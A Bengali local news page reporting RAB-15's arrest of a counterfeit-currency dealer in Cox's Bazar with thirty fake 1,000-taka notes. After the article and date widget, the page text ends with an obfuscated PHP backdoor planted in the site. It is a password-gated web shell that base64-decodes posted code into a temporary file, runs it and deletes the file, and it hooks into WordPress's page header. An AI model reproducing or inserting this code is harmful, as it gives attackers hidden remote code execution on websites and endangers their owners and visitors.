• বৃহস্পতিবার, ২০ জুন ২০২৪, ১২:০৯ পূর্বাহ্ন
সর্বশেষ খবর
শুধু এক টুকরো মাংস চায়, তাড়িয়ে দিলেও বার বার হাত বাড়ায় সৈকতে ঘুরতে গিয়ে দুর্বৃত্তের ছুরিকাঘাতে নিহত হোটেল কর্মী ঈদগাঁওতে পুকুরে ডুবে আদিবা-ইলমার মৃত্যু প্রথমবারের মতো প্রধানমন্ত্রীর সফর সঙ্গী হতে যাচ্ছেন নবনিযুক্ত প্রেস সচিব নাইমুল ইসলাম খান   সন্দ্বীপে যুবকের বিরুদ্ধে ভিসা দেয়ার নামে টাকা হাতিয়ে নেয়ার অভিযোগ : ভুক্তভোগীর উপর হামলা পাসপোর্ট ফিরে পেতে প্রধানমন্ত্রী ও ডিজির হস্তক্ষেপ কামনা :৪ বছরেও নাবায়ন হয়নি নির্যাতিত সাংবাদিক ফরিদুলের ডিজিটাল পাসপোর্ট শপথ গ্রহণ করেছেন কক্সবাজারের ৩ উপজেলা পরিষদের নবনির্বাচিত চেয়ারম্যান কক্সবাজারে ৬ নং বিপদ সংকেত  কক্সবাজারে মাংসের বাজারে কসাইদের অরাজকতা, বিক্রি হচ্ছে অন্য প্রাণীর গোস্ত বন্দরে ৩ নম্বর সংকেত,উপকূলে ১০ফুট জলোচ্ছ্বাসের আশংকা

সমিতি পাড়ায় র‌্যাবের অভিযানে জাল টাকার কারবারি রাসেল আটক

মোহাম্মদ ফয়সাল:
আপডেট : সোমবার, ১১ মার্চ, ২০২৪

মোহাম্মদ ফয়সাল :


আসন্ন রমজান ও ঈদউল ফিতর এর ব্যাস্ততম বাজারকে কেন্দ্র করে জাল টাকার অবৈধ চক্রের অন্যতম কারবারি রাসেল খান’কে কক্সবাজার জেলার সদর থানাধীন সমিতিপাড়া এলাকা থেকে ১,০০০ টাকার ৩০টি জাল নোট, নগদ ৫,১৫০ টাকা ও ০১টি মোবাইল’সহ র‌্যাব-১৫ গ্রেফতার করেছে।

 

র‌্যাব-১৫, কক্সবাজার গোপন সংবাদ ও তথ্যের ভিত্তিতে জানতে পারে যে, কক্সবাজার জেলার সদর থানাধীন কক্সবাজার পৌরসভার ০১ নং ওয়ার্ড সমিতি পাড়া এলাকার গোলাম মোস্তফার টিনশেড ভাড়া বাসার একটি কক্ষে জাল টাকাসহ একজন লোক অবস্থান করছে। উক্ত সংবাদের ভিত্তিতে অদ্য ১০ মার্চ ২০২৪ তারিখ সকাল অনুমান ০৬.৩০ ঘটিকায় র‌্যাব-১৫, সিপিএসসি ক্যাম্পের একটি চৌকস আভিযানিক দল বর্ণিত স্থানে বিশেষ অভিযান পরিচালনা করে। অভিযান পরিচালনাকালে র‌্যাবের আভিযানিক দল বর্ণিত স্থানে পৌঁছালে র‌্যাবের উপস্থিতি বুঝতে পেরে কৌশলে দৌড়ে পালানোর চেষ্টাকালে একজন জাল টাকার অন্যতম কারবারীকে গ্রেফতার করতে সক্ষম হয়। পরবর্তীতে উপস্থিত সাক্ষীদের সম্মুখে আটককৃত জাল টাকার কারবারীর দেহ তল্লাশী করে তার হেফাজত হতে সর্বমোট ৩০,০০০/- (ত্রিশ হাজার) টাকার জালনোট, নগদ ৫,১৫০/- (পাঁচ হাজার একশত পঞ্চাশ) টাকা ও ০১টি মোবাইল জব্দ করা হয়।

 

 গ্রেফতারকৃত জাল টাকার কারবারী মোঃ রাসেল খান (২৫), পিতা-নুরুল আনোয়ার প্রকাশ লালু মাঝি, মাতা-খাদিজা বেগম, সাং-মধ্যম কুুতবদিয়া পাড়া (লালু মাঝির বাড়ী), ০১নং পৌর ওয়ার্ড, এ/পি-সমিতির পাড়া, ০১নং ওয়ার্ড, জনৈক গোলাম মোস্তফার টিনশেড ভাড়াবাসা, থানা-সদর, জেলা-কক্সবাজার বলে জানা যায়।

আটককৃত রাসেল’কে ব্যাপক জিজ্ঞাসাবাদে জানা যায় যে, আসন্ন রমজান এবং ঈদ-উল-ফিতর কে কেন্দ্র সংঘবদ্ধ চক্রের মাধ্যমে চট্টগ্রাম ও কক্সবাজারের বিভিন্ন এলাকায় জাল টাকার অবৈধ ব্যবসার মাধ্যমে মানুষের টাকা হাতিয়ে নেওয়াই তাদের মুল টার্গেট। রমজান ও ঈদ-উল-ফিতর উপলক্ষে জাল টাকার নোট সংগ্রহ ও বাজারে ছেড়ে দেওয়ার লক্ষ্যে এই সংঘবদ্ধ চক্র সক্রিয় হয়েছে বলে জানা যায়। প্রতিটি এক হাজার টাকার জাল নোট সে ৫০০ টাকায় বিক্রি করে বলে জানায়। জনমনে স্বস্তি ও জনভোগান্তি রোধে জালনোট ছাপানো এবং তা বাজারে ছড়িয়ে দেয়া চক্রের অন্যান্য জালনোট ব্যবসায়ীদের গ্রেফতারে র‍্যাবের অভিযান অব্যাহত রয়েছে।

 

উদ্ধারকৃত আলামতসহ গ্রেফতারকৃত আসামীর বিরুদ্ধে প্রয়োজনীয় আইনানুগ ব্যবস্থা গ্রহণার্থে কক্সবাজার জেলার সদর মডেল থানায় লিখিত এজাহার দাখিল করা হয়েছে।


আরো বিভন্ন নিউজ দেখুন

ই-পেপার

আজকের দিন-তারিখ

  • বৃহস্পতিবার (রাত ১২:০৯)
  • ২০শে জুন, ২০২৪ খ্রিস্টাব্দ
  • ১৪ই জিলহজ, ১৪৪৫ হিজরি
  • ৬ই আষাঢ়, ১৪৩১ বঙ্গাব্দ (বর্ষাকাল)
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}